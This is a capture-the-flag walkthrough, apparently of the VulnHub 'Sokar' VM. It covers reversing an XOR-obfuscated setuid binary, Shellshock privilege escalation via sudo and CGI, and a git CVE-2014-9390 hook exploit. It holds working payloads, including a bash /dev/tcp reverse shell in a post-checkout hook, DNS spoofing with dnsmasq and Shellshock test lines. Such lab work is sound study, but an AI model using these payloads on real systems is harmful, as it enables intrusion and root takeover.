 91d: c7 85 78 ff ff ff 66 mov    DWORD PTR [rbp-0x88],0x3d202e66
 924: 2e 20 3d 
 927: c7 85 7c ff ff ff 69 mov    DWORD PTR [rbp-0x84],0x26252a69
 92e: 2a 25 26 
 931: c7 45 80 27 2c 69 3a mov    DWORD PTR [rbp-0x80],0x3a692c27
 938: c7 45 84 3a 21 73 66 mov    DWORD PTR [rbp-0x7c],0x6673213a
 93f: c7 45 88 66 3b 26 26 mov    DWORD PTR [rbp-0x78],0x26263b66
 946: c7 45 8c 3d 09 3a 26 mov    DWORD PTR [rbp-0x74],0x263a093d
 94d: c7 45 90 22 28 3b 64 mov    DWORD PTR [rbp-0x70],0x643b2822
 954: c7 45 94 2d 2c 3f 73 mov    DWORD PTR [rbp-0x6c],0x733f2c2d
 95b: c7 45 98 66 3b 26 26 mov    DWORD PTR [rbp-0x68],0x26263b66
 962: c7 45 9c 3d 66 3a 2c mov    DWORD PTR [rbp-0x64],0x2c3a663d
 969: c7 45 a0 2a 3b 2c 3d mov    DWORD PTR [rbp-0x60],0x3d2c3b2a
 970: c7 45 a4 64 39 3b 26 mov    DWORD PTR [rbp-0x5c],0x263b3964
 977: c7 45 a8 23 2c 2a 3d mov    DWORD PTR [rbp-0x58],0x3d2a2c23
 97e: c7 45 ac 69 66 24 27 mov    DWORD PTR [rbp-0x54],0x27246669
 985: c7 45 b0 3d 66 3a 2c mov    DWORD PTR [rbp-0x50],0x2c3a663d
 98c: c7 45 b4 2a 3b 2c 3d mov    DWORD PTR [rbp-0x4c],0x3d2c3b2a
 993: c7 45 b8 64 39 3b 26 mov    DWORD PTR [rbp-0x48],0x263b3964
 99a: c7 45 bc 23 2c 2a 3d mov    DWORD PTR [rbp-0x44],0x3d2a2c23
 9a1: 66 c7 45 c0 66 00     mov    WORD PTR [rbp-0x40],0x66
  9a7: 0f b7 05 d3 01 00 00 movzx  eax,WORD PTR [rip+0x1d3]        # b81 <_IO_stdin_used+0x19>
 9ae: 66 89 45 d0           mov    WORD PTR [rbp-0x30],ax
 9b2: 48 8d 35 b3 01 00 00 lea    rsi,[rip+0x1b3]        # b6c <_IO_stdin_used+0x4>
 9b9: bf 01 00 00 00       mov    edi,0x1
 9be: b8 00 00 00 00       mov    eax,0x0
 ----------
 Break here and look at $rbp-0x90 and $rsi with x/s:
 (gdb) x/s $rbp-0x90
x/s $rbp-0x90
0x7ffff7ff82e0: "f<:;f+ 'f. =i*%&',i::!sff;&&=\t:&\"(;d-,?sf;&&=f:,*;,=d9;&#,*=if$'=f:,*;,=d9;&#,*=f"
 
This looks like our encoded string.
 x/s $rsi
x/s $rsi
0x7f6625d7bb6c: "Build? (Y/N) "
 
 
 9c3: e8 68 fd ff ff       call   730 <__printf_chk@plt>
 9c8: 48 8d 5d e0           lea    rbx,[rbp-0x20]
 9cc: be 02 00 00 00       mov    esi,0x2
 9d1: 48 89 df             mov    rdi,rbx
 9d4: e8 87 fd ff ff       call   760 <__gets_chk@plt> ; accept string with stack protection
 9d9: 48 8d 75 d0           lea    rsi,[rbp-0x30]
 9dd: 48 89 df             mov    rdi,rbx ; store the address of the response string
 9e0: e8 ab fd ff ff       call   790 <strcmp@plt>
 9e5: 85 c0                 test   eax,eax ; is the response 'Y'
 9e7: 75 5e                 jne    a47 <main+0x158>   ; answer 'N'
 9e9: 49 89 e4             mov    r12,rsp ; save the stack pointer
 9ec: 48 8d 95 70 ff ff ff lea    rdx,[rbp-0x90] ; point to our string
 9f3: 48 89 d7             mov    rdi,rdx
 9f6: 48 c7 c1 ff ff ff ff mov    rcx,0xffffffffffffffff
 9fd: f2 ae                 repnz scas al,BYTE PTR es:[rdi] 
 9ff: 48 f7 d1             not    rcx
 a02: 48 83 c1 1d           add    rcx,0x1d
 a06: 48 83 e1 f0           and    rcx,0xfffffffffffffff0
 a0a: 48 29 cc             sub    rsp,rcx
 a0d: 48 8d 5c 24 0f       lea    rbx,[rsp+0xf]
 a12: 48 83 e3 f0           and    rbx,0xfffffffffffffff0
 a16: 48 89 de             mov    rsi,rbx
 a19: 48 89 d7             mov    rdi,rdx
 a1c: e8 8b fe ff ff       call   8ac <encryptDecrypt>     ; and decrypt the string (XOR w 0x49)
 a21: be 00 00 00 00       mov    esi,0x0
 a26: bf 00 00 00 00       mov    edi,0x0
 a2b: b8 00 00 00 00       mov    eax,0x0 ; suid to root
 a30: e8 6b fd ff ff       call   7a0 <setreuid@plt>
----------
If I can write over this with the correct command, namely /bin/sh, I'm golden
----------
 a35: 48 89 df             mov    rdi,rbx ; command:"/usr/bin/git clone ssh://root@sokar-dev:/root/secret-project /mnt/secret-project/"
 a38: b8 00 00 00 00       mov    eax,0x0          ; system call 
 a3d: e8 0e fd ff ff       call   750 <system@plt>
 a42: 4c 89 e4             mov    rsp,r12
 a45: eb 16                 jmp    a5d <main+0x16e>
 a47: 48 8d 35 2c 01 00 00 lea    rsi,[rip+0x12c]        # b7a <_IO_stdin_used+0x12>
 a4e: bf 01 00 00 00       mov    edi,0x1
 a53: b8 00 00 00 00       mov    eax,0x0
 a58: e8 d3 fc ff ff       call   730 <__printf_chk@plt>
 a5d: 48 8b 55 e8           mov    rdx,QWORD PTR [rbp-0x18]
 a61: 64 48 33 14 25 28 00 xor    rdx,QWORD PTR fs:0x28
 a68: 00 00 
 a6a: 74 05                 je     a71 <main+0x182>
 a6c: e8 0f fd ff ff       call   780 <__stack_chk_fail@plt>
 a71: 48 8d 65 f0           lea    rsp,[rbp-0x10]
 a75: 5b                   pop    rbx
 a76: 41 5c                 pop    r12
 a78: c9                   leave  
 a79: c3                   ret    
 a7a: 90                   nop
 a7b: 90                   nop
 a7c: 90                   nop
 a7d: 90                   nop
 a7e: 90                   nop
 a7f: 90                   nop
 
So, I took a look at what was stored by those mov DWORD PTR instructions:
 
>>> s="\x3b\x3a\x3c\x66\x27\x20\x2b\x66\x3d\x20\x2e\x66\x26\x25\x2a\x69\x3a\x69\x2c\x27\x66\x73\x21\x3a\x26\x26\x3b\x66\x26\x3a\x09\x3d\x64\x3b\x28\x22\x73\x3f\x2c\x2d\x26\x26\x3b\x66\x2c\x3a\x66\x3d\x3d\x2c\x3b\x2a\x26\x3b\x39\x64\x3d\x2a\x2c\x23\x27\x24\x66\x69\x2c\x3a\x66\x3d\x3d\x2c\x3b\x2a\x26\x3b\x39\x64\x3d\x2a\x2c\x23"
>>> s
';:<f\' +f= .f&%*i:i,\'fs!:&&;f&:\t=d;("s?,-&&;f,:f==,;*&;9d=*,#\'$fi,:f==,;*&;9d=*,#'
 
What about doing a byte by byte XOR against 0x49?
 
>>> o = ""
>>> for x in s: o = o + chr(ord(x)^73)
... 
>>> o
'/usr/bin/git clone ssh://root@sokar-dev:/root/secret-project /mnt/secret-project/'
>>>
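The same decode can be done straight from the disassembly instead of from the stack dump.  The following Python 3 script is an added example, not from the notes: it takes the 32-bit immediates of the mov DWORD PTR sequence above (plus the trailing mov WORD PTR 0x66), lays them out little-endian the way the CPU writes them to the stack, stops at the NUL terminator, and XORs every byte with 0x49, which reproduces the git command byte for byte.  Because XOR with a fixed key is its own inverse, the same function also re-encodes the plaintext back to what sits in the binary.

```python
import struct

# 32-bit immediates from the "mov DWORD PTR [rbp-0x90 .. rbp-0x44]" sequence in
# main, in stack order, followed by the final "mov WORD PTR [rbp-0x40],0x66".
STACK_DWORDS = [
    0x3b3a3c66, 0x27202b66, 0x3d202e66, 0x26252a69, 0x3a692c27,
    0x6673213a, 0x26263b66, 0x263a093d, 0x643b2822, 0x733f2c2d,
    0x26263b66, 0x2c3a663d, 0x3d2c3b2a, 0x263b3964, 0x3d2a2c23,
    0x27246669, 0x2c3a663d, 0x3d2c3b2a, 0x263b3964, 0x3d2a2c23,
]
STACK_TAIL_WORD = 0x0066
XOR_KEY = 0x49  # 'I', the single-byte key used by encryptDecrypt


def rebuild_stack_string(dwords, tail_word):
    """Lay the immediates out in memory order (x86-64 is little-endian, so the
    low byte of each immediate is the first character) and return the C
    string that ends at the first NUL byte."""
    raw = b"".join(struct.pack("<I", d) for d in dwords) + struct.pack("<H", tail_word)
    return raw.split(b"\x00", 1)[0]


def xor_decode(data, key):
    """Byte-wise XOR with a one-byte key; applying it twice returns the input."""
    return bytes(b ^ key for b in data).decode("ascii")


def decoded_command():
    """The command string that main hands to system() after decryption."""
    return xor_decode(rebuild_stack_string(STACK_DWORDS, STACK_TAIL_WORD), XOR_KEY)


if __name__ == "__main__":
    print(repr(rebuild_stack_string(STACK_DWORDS, STACK_TAIL_WORD)))
    print(decoded_command())
```

Reading the immediates out of the disassembly is the more reliable route when a binary cannot be run (or cannot be run safely, as with a setuid program), since it does not depend on catching the right moment in a debugger.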
------------------------
This is getting too deep.  I'll have to figure out the canary and all kinds of stuff to do a buffer overflow.  Maybe figure out a way to trick git into running a script I write while it runs as root.  Then I remembered that shellshock also works through environment variables, including ones sudo passes along.  Tried it as bynarr and got success!
 
[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
    !requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 
User bynarr may run the following commands on this host:
    (ALL) NOPASSWD: /home/bynarr/lime
 
[bynarr@sokar ~]$ sudo PS1="() { :; }; /bin/sh" /home/bynarr/lime
sudo PS1="() { :; }; /bin/sh" /home/bynarr/lime
sh-4.1# whoami
whoami
root
sh-4.1# ls /root
ls /root
build.c  flag
sh-4.1# cat /root/flag
cat /root/flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|
 
=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================
sh-4.1# cat /root/build.c
cat /root/build.c
#include <stdio.h>
#include <string.h>
 
void encryptDecrypt(char *input, char *output) {
        char key[] = {'I'};
 
        int i;
        for(i = 0; i < strlen(input); i++) {
                output[i] = input[i] ^ key[i % (sizeof(key)/sizeof(char))];
        }
}
 
int main (int argc, char *argv[]) {
 
        char baseStr[] = "f<:;f+ 'f. =i*%&',i::!sff;&&= :&\"(;d-,?sf;&&=f:,*;,=d9;&#,*=if$'=f:,*;,=d9;&#,*=f";
 
char a[2];
char b[2] = "Y";
 
printf("Build? (Y/N) ");
gets(a);
 
if( strcmp(a,b) == 0) {
 
       char encrypted[strlen(baseStr)];
       encryptDecrypt(baseStr, encrypted);
setreuid(0, 0);
       system(encrypted);
}
 
else
 
printf("OK :(\n");
 
}
sh-4.1# 
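
build.c tells us what the setuid build binary actually runs, but only after undoing the XOR. The following Python is an added example, not part of the original notes or of the VM, that applies the same single-byte XOR (key 'I') from encryptDecrypt() to the baseStr copied from the listing, then picks the ssh host and the clone destination out of the result. One assumption: the byte between "&&=" and ":&" that the page renders as a space must be a tab (0x09) in the real source, because 0x09 XOR 'I' is '@', and the clone prompt later in these notes confirms root@sokar-dev.

```python
# Ciphertext copied from the build.c listing above. The "\t" is an assumption:
# the page shows a space there, but only a tab (0x09) XORs with 'I' to '@'.
BASE_STR = "f<:;f+ 'f. =i*%&',i::!sff;&&=\t:&\"(;d-,?sf;&&=f:,*;,=d9;&#,*=if$'=f:,*;,=d9;&#,*=f"
KEY = b"I"  # char key[] = {'I'} in encryptDecrypt()


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the general form of encryptDecrypt() (1-byte key).

    XOR is its own inverse, so the same call encrypts and decrypts.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_build_command(base_str: str = BASE_STR, key: bytes = KEY) -> str:
    """Recover the string build.c hands to system() after the Y/N check."""
    return xor_with_key(base_str.encode("latin-1"), key).decode("latin-1")


def clone_target(cmd: str):
    """From `git clone <url> <dir>`, return (ssh host, destination dir).

    The host is the name any DNS spoofing has to answer for; the destination
    is the mount whose filesystem semantics the git bug depends on.
    """
    tokens = cmd.split()
    if len(tokens) < 4 or tokens[1] != "clone":
        raise ValueError("not a git clone command: %r" % cmd)
    url, dest = tokens[-2], tokens[-1]
    host = url.split("@", 1)[1].split(":", 1)[0]
    return host, dest


if __name__ == "__main__":
    cmd = decode_build_command()
    print("system() runs:", cmd)
    print("ssh host / clone destination:", clone_target(cmd))
```

The recovered command is a git clone over ssh, run as root (setreuid(0, 0) precedes system()), from a host named sokar-dev into a directory under /mnt. That gives the two levers used in the rest of the notes: control the name resolution of sokar-dev, and look at what filesystem /mnt is.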
----------------------------
Try getting root from apophis too.
 
OK, we know git is run from the setuid program /home/apophis/build.  I checked the version, 2.2.0, and looked for vulnerabilities.  I found CVE-2014-9390 (a malicious repository can carry a ".Git" directory through git, which then lands on top of the real .git at checkout) and https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
 
For this attack to work though, the file system git checks out onto has to be case insensitive, so I used the CGI Shellshock hole to look at the mounts:
 
curl -A '() { :;}; echo -en "\n\n$(/bin/mount)\n\n"' 192.168.56.101:591/cgi-bin/cat |grep -v Permission |grep -v proc
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1454    0  1454    0     0   159k      0 --:--:-- --:--:-- --:--:--  177k
 
/dev/sda1 on / type ext4 (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /mnt type vfat (rw,uid=501,gid=502)
 
Content-type: text/html
 
<pre>
 
So, /mnt is vfat, which is case insensitive: a ".Git/hooks" directory committed in the repository gets checked out into the real .git/hooks, and since build runs setuid root, git executes the hook as root.  On a kali machine, I created a git repository called secret-project and added a directory .Git/hooks.  In .Git/hooks I created a file post-checkout, and made it executable.
 
mkdir secret-project
cd secret-project
git init
mkdir .Git
mkdir .Git/hooks
cd .Git/hooks
vim post-checkout
cat post-checkout
 
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.103/4444 0>&1
 
chmod +x post-checkout
git add .
git commit -m firsttry
 
Now I set up dnsmasq on kali so that sokar-dev resolves to my box, started sshd for the clone to talk to, and a listener for the hook's reverse shell.
dnsmasq --address=/sokar-dev/192.168.56.103
service ssh start
nc -nlvp 4444
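
What makes the .Git directory dangerous is that git 2.2.0 stores it in a tree without complaint, and a case-insensitive filesystem (the vfat mount at /mnt here) turns it into the real .git on checkout.  Git 2.2.1 closed this by refusing tree entries that some filesystem could map onto .git: case variants, the NTFS 8.3 short name git~1, and .git with HFS+ ignorable code points inserted.  The Python below is an added example, not part of the original notes or of git itself, that applies the same kind of check to a constructed list of tree paths of the sort `git ls-tree -r --name-only HEAD` prints, so a repository can be screened before an unpatched git checks it out.

```python
# Code points HFS+ ignores when comparing filenames, so ".g\u200cit" collides with ".git".
HFS_PLUS_IGNORABLE = {
    0x200C, 0x200D, 0x200E, 0x200F,                  # zero-width (non-)joiner, LRM, RLM
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,          # bidi embedding/override controls
    0x206A, 0x206B, 0x206C, 0x206D, 0x206E, 0x206F,  # deprecated format characters
    0xFEFF,                                          # zero width no-break space / BOM
}


def maps_onto_dotgit(component: str) -> bool:
    """True if some filesystem could treat this path component as ".git".

    Covers case-insensitive filesystems (vfat, NTFS, default HFS+): ".Git";
    NTFS 8.3 short names: "git~1" is the short name of ".git";
    HFS+ ignorable code points: ".g<U+200C>it".
    """
    stripped = "".join(ch for ch in component if ord(ch) not in HFS_PLUS_IGNORABLE)
    if stripped.lower() == ".git":
        return True
    if component.lower() == "git~1":
        return True
    return False


def dotgit_paths(tree_paths):
    """Tree paths with any component that could be checked out into .git."""
    return sorted(p for p in tree_paths
                  if any(maps_onto_dotgit(c) for c in p.split("/")))


# Constructed tree listing; the first entry is the layout built in these notes.
SAMPLE_TREE = [
    ".Git/hooks/post-checkout",
    "GIT~1/hooks/pre-commit",
    "docs/.g\u200cit/HEAD",
    "legit/file.txt",
    "src/main.c",
    "README",
]

if __name__ == "__main__":
    for path in dotgit_paths(SAMPLE_TREE):
        print("refuse checkout:", path)
```

A plain ".gitignore" or a directory called "legit" does not trip the check; only components that a filesystem would actually fold onto ".git" do, which is the same boundary git 2.2.1 draws.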
 
Back at the sokar device,
 
/home/apophis/build
 
Nothing happened.
 
Go back to the root shell via bynarr and take a look at the firewall rules, just to short-circuit the troubleshooting.
 
[bynarr@sokar ~]$ sudo PS1="() { :;}; /bin/sh" /home/bynarr/lime
sudo PS1="() { :;}; /bin/sh" /home/bynarr/lime
sh-4.1# iptables -L
iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHED 
DROP       icmp --  anywhere             anywhere            
ACCEPT     all  --  anywhere             anywhere            
ACCEPT     tcp  --  anywhere             anywhere            state ESTABLISHED tcp spt:ssh 
ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED tcp dpt:591 
ACCEPT     udp  --  anywhere             anywhere            udp spt:domain 
 
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
 
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED owner UID match root tcp dpt:ssh 
ACCEPT     udp  --  anywhere             anywhere            udp dpt:domain owner UID match root 
ACCEPT     tcp  --  anywhere             anywhere            state ESTABLISHED tcp spt:591 
ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED owner GID match bynarr tcp dpt:51242 
DROP       all  --  anywhere             anywhere            
sh-4.1# 
 
So, root (the uid the hook runs as) can only open outbound connections to tcp port 22 and dns port udp 53; everything else, including my reverse shell to 4444, hits the final DROP in OUTPUT.  I'll change my post-checkout to call back on port 22 and move the listener to match, to confirm the exploit.
 
[apophis@sokar bynarr]$ /home/apophis/build
/home/apophis/build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
root@sokar-dev's password: xxxxxxxxx
 
remote: Counting objects: 52, done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 52 (delta 1), reused 0 (delta 0)
Receiving objects: 100% (52/52), done.
Resolving deltas: 100% (1/1), done.
Checking connectivity... done.
 
And on kali:
 
root@kali:~# nc -nlvp 22
listening on [any] 22 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.101] 37753
[root@sokar secret-project]# cat /root/flag
cat /root/flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|
 
=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================
 
Additional information:
 
There's a Wikipedia article about Shellshock that goes into several related attacks.  It's at https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29
 
The git vulnerability (CVE-2014-9390) affects versions before 2.2.1, which is where the check for .git look-alike paths was added.
 
Sokar was running an older bash:
bash -help
bash -help
GNU bash, version 4.1.2(1)-release-(x86_64-redhat-linux-gnu)
 
Per the wiki, the fixes are in bash patch bash43-027 (with corresponding patches for the older release series, 4.1 included).  Take a look at the other CVEs as they relate to CGI (what worked here through apache), DHCP, and a couple of other avenues.  Some vulnerabilities from the wiki (quoted) with runs on the sokar machine to test:
 
Initial report (CVE-2014-6271)
 
This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[39] The vulnerability can be tested with the following command:
 
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 
[root@sokar bynarr]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
<'() { :;}; echo vulnerable' bash -c "echo this is a test"                   
vulnerable
this is a test
 
In systems affected by the vulnerability, the above commands will display the word "vulnerable" as a result of Bash executing the command "echo vulnerable", which was embedded into the specially crafted environment variable named "x".[8][40]
 
 
CVE-2014-7169
 
On the same day the original vulnerability was published, Tavis Ormandy discovered this related bug[31] which is demonstrated in the following code:
 
env X='() { (a)=>\' bash -c "echo date"; cat echo
 
[root@sokar bynarr]# env X='() { (a)=>\' bash -c "echo date"; cat echo
env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Tue Jan 26 20:30:10 GMT 2016
[root@sokar bynarr]# cat echo
cat echo
Tue Jan 26 20:30:10 GMT 2016
[root@sokar bynarr]# 
 
On a vulnerable system this would execute the command "date" unintentionally.[31]
 
CVE-2014-7186
 
Florian Weimer and Todd Sabin found this bug,[8][38] which relates to an out-of-bounds memory access error in the Bash parser code.[44]
 
An example of the vulnerability, which leverages the use of multiple "<<EOF" declarations:
 
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
 echo "CVE-2014-7186 vulnerable, redir_stack"
[root@sokar bynarr]# bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
 echo "CVE-2014-7186 vulnerable, redir_stack"
<<<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||       
>  echo "CVE-2014-7186 vulnerable, redir_stack"
Segmentation fault
CVE-2014-7186 vulnerable, redir_stack
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
 
CVE-2014-7187
 
Also found by Florian Weimer,[8] this is an off-by-one error in the Bash parser code, allowing out-of-bounds memory access.[45]
 
An example of the vulnerability, which leverages the use of multiple "done" declarations:
 
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
[root@sokar bynarr]# (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
<done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"         
bash: line 129: syntax error near `x129'
bash: line 129: `for x129 in ; do :'
CVE-2014-7187 vulnerable, word_lineno
 
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno". This test requires a shell that supports brace expansion.[46]
